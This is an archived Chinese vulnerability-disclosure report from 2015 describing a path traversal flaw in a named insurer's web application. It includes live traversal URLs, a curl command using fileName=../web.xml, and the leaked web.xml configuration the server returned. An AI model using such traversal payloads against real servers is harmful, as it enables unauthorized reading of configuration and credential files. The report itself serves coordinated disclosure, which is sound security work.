乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-21: 细节已通知厂商并且等待厂商处理中 2015-09-21: 厂商已经确认,细节仅向厂商公开 2015-10-01: 细节向核心白帽子及相关领域专家公开 2015-10-11: 细节向普通白帽子公开 2015-10-21: 细节向实习白帽子公开 2015-11-05: 细节向公众公开
1,此漏洞也是意外发现的,主要不是想搞这个漏洞的
1,web.xmlhttp://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../web.xml2,log4j.xmlhttp://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../classes/log4j.xml
curl -vv 'http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../web.xml'* Hostname was NOT found in DNS cache* Trying 111.203.203.13...* Connected to kybpc.chexian.sinosig.com (111.203.203.13) port 80 (#0)> GET /easyInsurance/html5/downLoad.do?fileName=../web.xml HTTP/1.1> User-Agent: curl/7.37.1> Host: kybpc.chexian.sinosig.com> Accept: */*> < HTTP/1.1 200 OK* Server Apache-Coyote/1.1 is not blacklisted< Server: Apache-Coyote/1.1< X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5< Content-Disposition: attachment;filename=../web.xml< Content-Type: application/xml;charset=UTF-8< Content-Language: zh-CN< Transfer-Encoding: chunked< Date: Mon, 21 Sep 2015 04:49:24 GMT< <?xml version="1.0" encoding="utf-8"?><web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.4" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"> <!-- Spring ApplicationContext配置文件的路径?,可使用通配符,多个路径用?1, 号分隔 此参数用于后面的Spring-Context loader --> <context-param> <param-name>contextConfigLocation</param-name> <param-value> classpath*:spring/*.xml </param-value> </context-param> <context-param> <param-name>javax.servlet.jsp.jstl.fmt.localizationContext</param-name> <param-value>i18n/messages</param-value> </context-param> <context-param> <param-name>log4jConfigLocation</param-name> <param-value>/WEB-INF/classes/log4j.xml</param-value> </context-param> <context-param> <param-name>log4jRefreshInterval</param-name> <param-value>5</param-value> </context-param> <!-- 服务器缓存类型 --> <context-param> <param-name>cacheType</param-name> <param-value>ehcache</param-value> </context-param> <!-- 著名 Character Encoding filter --> <filter> <filter-name>encodingFilter</filter-name> <filter-class>org.springframework.web.filter.CharacterEncodingFilter</filter-class> <init-param> <param-name>encoding</param-name> <param-value>UTF-8</param-value> </init-param> </filter> <!-- 页面元素的GZIP压缩 Filter --> <filter> <filter-name>compressFilter</filter-name> <filter-class>ins.framework.web.CompressFilter</filter-class> <init-param> <param-name>ignoreKey</param-name> <param-value>.js,.css,.gif,.jpg,.vbs</param-value> </init-param> </filter> <filter> <filter-name>struts2</filter-name> <filter-class> org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter </filter-class> </filter> <filter> <filter-name>SessionFilter</filter-name> <filter-class>com.sinosoft.easyInsurance.common.web.SessionFilter</filter-class> </filter> <filter> <filter-name>MenuDisabledFilter</filter-name> <filter-class>com.sinosoft.easyInsurance.common.web.MenuDisabledFilter</filter-class> </filter> <!-- Cache Filter 缓存过滤器 --> <filter> <filter-name>CacheFilter</filter-name> <filter-class>ins.framework.web.CacheFilter</filter-class> <init-param> <param-name>expireTime</param-name> <param-value>300</param-value> </init-param> </filter> <filter-mapping> <filter-name>CacheFilter</filter-name> <url-pattern>*.js</url-pattern> </filter-mapping> <filter-mapping> <filter-name>CacheFilter</filter-name> <url-pattern>*.css</url-pattern> </filter-mapping> <filter-mapping> <filter-name>CacheFilter</filter-name> <url-pattern>*.gif</url-pattern> </filter-mapping> <filter-mapping> <filter-name>CacheFilter</filter-name> <url-pattern>*.jpg</url-pattern> </filter-mapping> <filter-mapping> <filter-name>CacheFilter</filter-name> <url-pattern>*.vbs</url-pattern> </filter-mapping> <filter-mapping> <filter-name>CacheFilter</filter-name> <url-pattern>*.html</url-pattern> </filter-mapping> <filter-mapping> <filter-name>encodingFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>encodingFilter</filter-name> <url-pattern>*.do</url-pattern> </filter-mapping> <!-- 页面元素的GZIP压缩 Filter,减少网络带宽 --> <filter-mapping> <filter-name>compressFilter</filter-name> <url-pattern>*.js</url-pattern> </filter-mapping> <filter-mapping> <filter-name>MenuDisabledFilter</filter-name> <url-pattern>*.do</url-pattern> </filter-mapping> <filter-mapping> <filter-name>struts2</filter-name> <url-pattern>*.do</url-pattern> </filter-mapping> <filter-mapping> <filter-name>struts2</filter-name> <url-pattern>*.jsp</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>FORWARD</dispatcher> <dispatcher>INCLUDE</dispatcher> </filter-mapping> <filter-mapping> <filter-name>struts2</filter-name> <url-pattern>/struts/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>SessionFilter</filter-name> <url-pattern>*.do</url-pattern> </filter-mapping> <filter-mapping> <filter-name>SessionFilter</filter-name> <url-pattern>*.jsp</url-pattern> </filter-mapping> <filter-mapping> <filter-name>SessionFilter</filter-name> <url-pattern>/*Servlet</url-pattern> </filter-mapping> <!-- 日志 --> <listener> <listener-class>org.springframework.web.util.Log4jConfigListener</listener-class> </listener> <!-- Session Log Listener 载入 <listener> <listener-class> ins.common.web.ClaimHttpSessionListener </listener-class> </listener> --> <!--Spring ApplicationContext 载入 --> <listener> <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class> </listener> <listener> <listener-class>org.springframework.web.context.request.RequestContextListener</listener-class> </listener> <!-- Spring 刷新Introspector防止内存泄露 --> <listener> <listener-class> org.springframework.web.util.IntrospectorCleanupListener </listener-class> </listener> <!-- cacheManager 服务端缓存 --> <listener> <listener-class>ins.framework.cache.CacheManagerInitListener</listener-class> </listener> <!-- requestCombo 合并组件 --> <servlet> <servlet-name>RequestComboServlet</servlet-name> <servlet-class>ins.platform.requestcombo.RequestComboServlet</servlet-class> <init-param> <description>允许访问的URL前缀,避免源码泄漏风险</description> <param-name>validPrefix</param-name> <param-value>/widgets/</param-value> </init-param> <init-param> <description>是否开启服务端对js文件混淆压缩</description> <param-name>isCompress</param-name> <param-value>false</param-value> </init-param> </servlet> <servlet-mapping> <servlet-name>RequestComboServlet</servlet-name> <url-pattern>/requestCombo</url-pattern> </servlet-mapping> <filter-mapping> <filter-name>CacheFilter</filter-name> <url-pattern>/requestCombo</url-pattern> </filter-mapping> <filter-mapping> <filter-name>compressFilter</filter-name> <url-pattern>/requestCombo</url-pattern> </filter-mapping><!-- <servlet> <display-name>Apache-Axis Servlet</display-name> <servlet-name>AxisServlet</servlet-name> <servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class> </servlet> <servlet> <display-name>Axis Admin Servlet</display-name> <servlet-name>AdminServlet</servlet-name> <servlet-class>org.apache.axis.transport.http.AdminServlet</servlet-class> <load-on-startup>100</load-on-startup> </servlet> --> <servlet> <servlet-name>serviceFactoryInitServlet</servlet-name> <servlet-class> com.sinosoft.easyInsurance.common.web.ServiceFactoryInitServlet </servlet-class> <load-on-startup>3</load-on-startup> </servlet><!-- <servlet-mapping> <servlet-name>AxisServlet</servlet-name> <url-pattern>/servlet/AxisServlet</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>AxisServlet</servlet-name> <url-pattern>*.jws</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>AxisServlet</servlet-name> <url-pattern>/services/*</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>AdminServlet</servlet-name> <url-pattern>/servlet/AdminServlet</url-pattern> </servlet-mapping> --> <!-- session超时定义,单位为分钟 --> <session-config> <session-timeout>60</session-timeout> </session-config> <mime-mapping> <extension>js</extension> <mime-type>text/javascript;charset=utf-8</mime-type> </mime-mapping> <mime-mapping> <extension>htm</extension> <mime-type>text/html;charset=utf-8</mime-type> </mime-mapping> <servlet> <servlet-name>allocatePushServlet</servlet-name> <servlet-class> com.sinosoft.easyInsurance.common.web.ProxyServlet </servlet-class><!-- <load-on-startup>3</load-on-startup> --> </servlet> <servlet-mapping> <servlet-name>allocatePushServlet</servlet-name> <url-pattern>/allocatePushServlet</url-pattern> </servlet-mapping></web-app>
我就不再深入了
危害等级:中
漏洞Rank:6
确认时间:2015-09-21 14:23
感谢提交
暂无